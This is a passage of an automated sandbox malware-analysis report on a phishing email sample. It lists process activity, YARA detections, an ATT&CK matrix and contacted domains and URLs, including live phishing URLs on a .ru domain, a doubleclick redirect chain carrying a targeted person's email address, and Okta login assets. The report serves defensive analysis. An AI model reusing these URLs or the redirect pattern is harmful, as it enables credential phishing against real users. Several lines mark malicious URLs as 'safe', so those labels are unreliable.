                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32Jump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} DeviceTicketJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiDebug via timestamp check
                Source: Yara matchFile source: 3.25.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.11..script.csv, type: HTML
                Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.12..script.csv, type: HTML
                Source: Yara matchFile source: 1.3.pages.csv, type: HTML
                Source: Yara matchFile source: 2.5.pages.csv, type: HTML
                Source: Yara matchFile source: 1.4.pages.csv, type: HTML
                Source: 437cb98f-02e6-3095-7a14-f6ed0fcbd9b6.emlBinary or memory string: eS1VQ1MgZGVmCi9DTWFwVHlwZSAyIGRlZgoxIGJlZ2luY29kZXNwYWNlcmFuZ2UKPDAwMDA+IDxG
                Source: 437cb98f-02e6-3095-7a14-f6ed0fcbd9b6.emlBinary or memory string: L09yZGVyaW5nIChVQ1MpIC9TdXBwbGVtZW50IDAgPj4gZGVmCi9DTWFwTmFtZSAvQWRvYmUtSWRl
                Source: 437cb98f-02e6-3095-7a14-f6ed0fcbd9b6.emlBinary or memory string: IDAgPj4gZGVmCi9DTWFwTmFtZSAvQWRvYmUtSWRlbnRpdHktVUNTIGRlZgovQ01hcFR5cGUgMiBk
                Source: 437cb98f-02e6-3095-7a14-f6ed0fcbd9b6.emlBinary or memory string: 75VnQzhybQJHEkAjGgWQCXI7RRvVW2/EresP4xjhOEGnATTgcQAFfOw94Ug0Na9vMCIzXMm2Zq39
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformationJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid AccountsWindows Management Instrumentation31
                Browser Extensions                		1
                Process Injection                		13
                Masquerading                		OS Credential Dumping1
                Security Software Discovery                		Remote ServicesData from Local System1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scripting                		1
                DLL Side-Loading                		1
                Modify Registry                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Web Protocols                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                DLL Side-Loading                		Logon Script (Windows)1
                Process Injection                		Security Account Manager1
                File and Directory Discovery                		SMB/Windows Admin SharesData from Network Shared Drive3
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS13
                System Information Discovery                		Distributed Component Object ModelInput Capture4
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA SecretsInternet Connection DiscoverySSHKeylogging5
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                File Deletion                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1640942 Sample: 437cb98f-02e6-3095-7a14-f6e... Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 37 Found malware configuration 2->37 39 AI detected phishing page 2->39 41 Yara detected AntiDebug via timestamp check 2->41 43 10 other signatures 2->43 8 OUTLOOK.EXE 514 84 2->8         started        11 chrome.exe 5 2->11         started        process3 dnsIp4 25 C:\...\~Outlook Data File - NoEmail.pst.tmp, data 8->25 dropped 27 C:\Users\...\Outlook Data File - NoEmail.pst, Microsoft 8->27 dropped 14 Acrobat.exe 73 8->14         started        16 ai.exe 8->16         started        35 192.168.2.17, 138, 443, 49173 unknown unknown 11->35 18 chrome.exe 11->18         started        file5 process6 dnsIp7 21 AcroCEF.exe 128 14->21         started        29 adclick.g.doubleclick.net 142.250.185.162, 443, 49713, 49717 GOOGLEUS United States 18->29 31 www.google.com 172.217.16.132, 443, 49817 GOOGLEUS United States 18->31 33 18 other IPs or domains 18->33 process8 process9 23 AcroCEF.exe 2 21->23         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-bold.woff0%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-vf.woff20%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/kfQGTJxyJYyA40vgITtDB0PwqPDDJNVk7exSUpKdygy0%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/qxQ4HAEDWuhosbVQ1dW6HqvLQzGIwgJj7Hg4HAJk0Df36BLVjCV9Mhx0%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/ijSWB6XDt2x23vPWFuGmlisfdPo0Mn2Fqr4oBXq1n5NrfcM46mk9Zmyz2300%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/qr347VQocLux8bJ296y3sGsK0qKDjDkaqzGUesuvjEQdpuQn0RocxGsyZziUJj4ef2400%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/uveXL7lccWo3VQL1AQNrNkqrY0gg6oIq92t2l0121300%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/12EsS6v4KGIxyn8567130%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/yziOkKzJZKPnEqui42UNe02Trs1vH0s5elZ6Hr1mNBwuab1800%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/klQ2Of4c6LA3qOVx1jLq0IKv1BfNb563yNbAtqnsmiChZNDrOoVJ0r9kvS36F5wx2110%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/op328rcsbOGBUSeGtzq25hcrvpTsZOfghsLFQq1ELO8tMocL4jZef1990%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/oppCC2yff12YyfUIa0hvdyqmnO1npn8eKKiH671400%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/favicon.ico0%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-bold.woff20%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/ve47VQocLux8bJ296yn6GsK0qKDjDkaqz7v0%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-vf2.woff20%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-regular.woff0%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/efFrs1BHOKLi9ZMJGcklORTeAzVJNu5QdrBIkKhzcI5a901500%Avira URL Cloudsafe
                https://zy03ki.qakaco.ru/loray$vfuz4e0%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/uvtEwEyzMAhf6EpnunDLNl1fXrnAsov2mnPpoo2EjamMRPOTqFQN1a7tgWlOFf9HWC0Fgh2600%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/ijeLyVUGNsKP7COU4jZjq9x7klsBCi5YH6sFBErcQVzoldipaq9Ref2100%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/klqxZQ7i49HVQDFkT2K9BPiyyzFXOnXx5i81oj42ckX3Ue561690%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-regular.woff20%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/xyEc4pKtKNGKpq6cd300%Avira URL Cloudsafe
                https://2025_notificationx1invoice_review.fmhjhctk.ru/34WyyfLCF60WyWJTghhC89MW03f9FF671100%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                adclick.g.doubleclick.net
                		142.250.185.162
                		truefalse
                  		high
                  a.nel.cloudflare.com
                  		35.190.80.1
                  		truefalse
                    		high
                    2025_notificationx1invoice_review.fmhjhctk.ru
                    		104.21.16.1
                    		truefalse
                      		high
                      developers.cloudflare.com
                      		104.16.2.189
                      		truefalse
                        		high
                        github.com
                        		140.82.121.4
                        		truefalse
                          		high
                          zy03ki.qakaco.ru
                          		172.67.180.46
                          		truefalse
                            		high
                            mdvdrzasmwqth3qml8y9wfk13vbyxtc66szdgcmvnowenilgvs1vtfskk3t.amayaxw.es
                            		104.21.49.96
                            		truefalse
                              		high
                              code.jquery.com
                              		151.101.130.137
                              		truefalse
                                		high
                                cdnjs.cloudflare.com
                                		104.17.25.14
                                		truefalse
                                  		high
                                  challenges.cloudflare.com
                                  		104.18.95.41
                                  		truefalse
                                    		high
                                    get.geojs.io
                                    		104.26.0.100
                                    		truefalse
                                      		high
                                      www.google.com
                                      		172.217.16.132
                                      		truefalse
                                        		high
                                        s-0005.dual-s-msedge.net
                                        		52.123.129.14
                                        		truefalse
                                          		high
                                          d19d360lklgih4.cloudfront.net
                                          		13.33.187.120
                                          		truefalse
                                            		high
                                            objects.githubusercontent.com
                                            		185.199.109.133
                                            		truefalse
                                              		high
                                              ok4static.oktacdn.com
                                              		unknown
                                              		unknownfalse
                                                		high

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                https://2025_notificationx1invoice_review.fmhjhctk.ru/aNAtEaDInodo/false
                                                  		unknown
                                                  https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-bold.wofffalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://2025_notificationx1invoice_review.fmhjhctk.ru/ijSWB6XDt2x23vPWFuGmlisfdPo0Mn2Fqr4oBXq1n5NrfcM46mk9Zmyz230false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                    		high
                                                    https://a.nel.cloudflare.com/report/v4?s=Ju%2FeqZEAdF4RfZt88da0Ye4U4Y8DkKNL92cHBVSYNzii%2BLsPPFgTOTvtPw0z4qVb2nsFz%2F%2FiUWq0egloLQIhs7rhKiBDh2jreEkQBjnWFO0KcriuPF6Ubl5A3jV0false
                                                      		high
                                                      https://otelrules.svc.static.microsoft/rules/rule120639v0s19.xmlfalse
                                                        		high
                                                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                          		high
                                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                            		high
                                                            https://2025_notificationx1invoice_review.fmhjhctk.ru/kfQGTJxyJYyA40vgITtDB0PwqPDDJNVk7exSUpKdygyfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://2025_notificationx1invoice_review.fmhjhctk.ru/qxQ4HAEDWuhosbVQ1dW6HqvLQzGIwgJj7Hg4HAJk0Df36BLVjCV9Mhxfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                              		high
                                                              https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-vf.woff2false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://adclick.g.doubleclick.net/pcs/click?ref={{RANDOM_STRING}}&id=Y41515N2435yMX419snVO7695-2024-McWAN324SCAN&token={{RANDOM_STRING}}&adurl=https%3A%2F%2Fadclick.g.doubleclick.net%2Fpcs%2Fclick%3Fref%3D{{RANDOM_STRING}}%26id%3DY41515N2435yMX419snVO7695-2024-McWAN324SCAN%26adurl%3Dhttps%3A%2F%2F2025_Notificationx1Invoice_Review.fmhjhctk.ru%2FaNAtEaDInodo%2F%23Yjohng@edcodistributing.comfalse
                                                                		high
                                                                https://2025_notificationx1invoice_review.fmhjhctk.ru/uveXL7lccWo3VQL1AQNrNkqrY0gg6oIq92t2l012130false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://2025_notificationx1invoice_review.fmhjhctk.ru/yziOkKzJZKPnEqui42UNe02Trs1vH0s5elZ6Hr1mNBwuab180false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://2025_notificationx1invoice_review.fmhjhctk.ru/12EsS6v4KGIxyn856713false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://2025_notificationx1invoice_review.fmhjhctk.ru/qr347VQocLux8bJ296y3sGsK0qKDjDkaqzGUesuvjEQdpuQn0RocxGsyZziUJj4ef240false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                                  		high
                                                                  https://2025_notificationx1invoice_review.fmhjhctk.ru/klQ2Of4c6LA3qOVx1jLq0IKv1BfNb563yNbAtqnsmiChZNDrOoVJ0r9kvS36F5wx211false
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://2025_notificationx1invoice_review.fmhjhctk.ru/op328rcsbOGBUSeGtzq25hcrvpTsZOfghsLFQq1ELO8tMocL4jZef199false
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://2025_notificationx1invoice_review.fmhjhctk.ru/ve47VQocLux8bJ296yn6GsK0qKDjDkaqz7vfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://2025_notificationx1invoice_review.fmhjhctk.ru/aNAtEaDInodo/#Yjohng@edcodistributing.comfalse
                                                                    		unknown
                                                                    https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                                      		high
                                                                      https://2025_notificationx1invoice_review.fmhjhctk.ru/oppCC2yff12YyfUIa0hvdyqmnO1npn8eKKiH67140false
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKtrue
                                                                        		unknown
                                                                        https://2025_notificationx1invoice_review.fmhjhctk.ru/favicon.icofalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://developers.cloudflare.com/favicon.pngfalse
                                                                          		high
                                                                          https://otelrules.svc.static.microsoft/rules/rule120638v0s19.xmlfalse
                                                                            		high
                                                                            https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                                                              		high
                                                                              https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBK#true
                                                                                		unknown
                                                                                https://a.nel.cloudflare.com/report/v4?s=g2nNpGMYBa77YWP4pp43vkEbY7cJyANS2DG%2Fuxtd%2FMFfeM68cDAKs2DIETqvjtW6nDX%2FrP%2BEJUV2jhPpfWnszOsFQhnKS92yX9be5s%2FV%2BCA6SfFMKVdPAZsIaQuufalse
                                                                                  		high
                                                                                  https://otelrules.svc.static.microsoft/rules/rule120640v0s19.xmlfalse
                                                                                    		high
                                                                                    https://otelrules.svc.static.microsoft/rules/rule120637v0s19.xmlfalse
                                                                                      		high
                                                                                      https://otelrules.svc.static.microsoft/rules/rule120641v0s19.xmlfalse
                                                                                        		high
                                                                                        https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-bold.woff2false
